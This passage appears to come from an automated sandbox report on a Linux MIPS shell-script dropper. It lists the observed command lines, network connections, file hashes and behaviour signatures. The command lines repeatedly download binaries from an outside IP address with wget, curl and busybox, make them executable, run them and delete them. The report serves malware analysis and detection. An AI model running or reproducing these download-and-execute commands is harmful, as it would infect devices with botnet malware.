[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

memory/869-1-0xb6743000-0xb6754044-memory.dmp

memory/908-2-0xb66d2000-0xb66e3044-memory.dmp

memory/908-3-0xb669c000-0xb66ad044-memory.dmp

memory/928-4-0xb678f000-0xb67a0044-memory.dmp

memory/934-5-0xb6733000-0xb6744044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-29 01:01

Reported

2024-10-29 01:04

Platform

debian9-mipsbe-20240611-en

Max time kernel

76s

Max time network

78s

Command Line

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
